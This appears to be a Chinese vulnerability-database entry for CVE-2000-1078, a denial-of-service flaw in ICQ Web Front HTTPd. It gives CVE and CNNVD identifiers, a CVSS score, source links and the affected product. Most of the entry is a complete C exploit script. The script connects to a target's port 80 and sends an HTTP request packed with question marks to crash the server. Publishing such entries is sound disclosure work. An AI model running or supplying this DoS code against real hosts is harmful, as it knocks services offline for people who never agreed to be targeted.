ICQ Web Front HTTPd漏洞

ICQ Web Front HTTPd漏洞

漏洞ID 1105743 漏洞类型 未知
发布时间 2000-03-10 更新时间 2000-12-11
图片[1]-ICQ Web Front HTTPd漏洞-安全小百科CVE编号 CVE-2000-1078
图片[2]-ICQ Web Front HTTPd漏洞-安全小百科CNNVD-ID CNNVD-200012-030
漏洞平台 CGI CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/20071
https://www.securityfocus.com/bid/88453
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200012-030
|漏洞详情
ICQWebFrontHTTPd存在漏洞。远程攻击者通过请求包含“?”字符的URL导致服务拒绝。
|漏洞EXP
source: http://www.securityfocus.com/bid/1463/info

The guestbook CGI program in ICQ Web Front service for ICQ 2000a, 99b, and others allows remote attackers to cause a denial of service via a URL with a long name parameter.

/* ICQ Web Front DoS */

#include <sys/socket.h> 
#include <stdio.h> 
#include <netinet/in.h>
#include <netdb.h>

void main(int argc, char *argv[]) 
{ 
  int sock;
  struct in_addr addr; 
  struct sockaddr_in sin; 
  struct hostent *he; 
  unsigned long start; 
  unsigned long end; 
  unsigned long counter;  
  
  /* added extra ? to be on the safe side :) */
  char xploitstr1[50]="GET /?????????? HTTP/1.0 nn";
  
  
  printf("ICQ Web Front DoS - author: char0hlz/tPGn");  
  printf("The Poor Gurus' Network [http://www.tpgn.net]n");

  if (argc<2) 
  { 
    printf("usage: %s <hostname>n", argv[0]); 
    exit(0); 
  } 
  if ((he=gethostbyname(argv[1])) == NULL) 
  { 
    herror("gethostbyname"); 
    exit(0); 
  }  
    start=inet_addr(argv[1]); 
    counter=ntohl(start); 
    sock=socket(AF_INET,SOCK_STREAM,0); 
    bcopy(he->h_addr,(char *)&sin.sin_addr, he->h_length); 
    sin.sin_family=AF_INET; 
    sin.sin_port=htons(80); 
    if (connect(sock,(struct sockaddr*)&sin,sizeof(sin))!=0) 
    { 
      perror("pr0blemz"); 
    } 
    send(sock,xploitstr1,strlen(xploitstr1),0);
    close(sock);
    
   printf("Done. Refresh the page to see if it worked.n"); 
}
|受影响的产品
Mirabilis Icq Web Front Windows 9X
|参考资料

来源:XF
名称:icq-webfront-url-dos
链接:http://xforce.iss.net/static/5332.php
来源:BUGTRAQ
名称:20001007ICQWebFrontHTTPdDoS
链接:http://www.securityfocus.com/archive/1/138332

相关推荐: Microsoft Windows NT 4.0/2000 – LPC Zone Memory Depletion Denial of Service

Microsoft Windows NT 4.0/2000 – LPC Zone Memory Depletion Denial of Service 漏洞ID 1053466 漏洞类型 发布时间 2000-10-03 更新时间 2000-10-03 CVE编…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享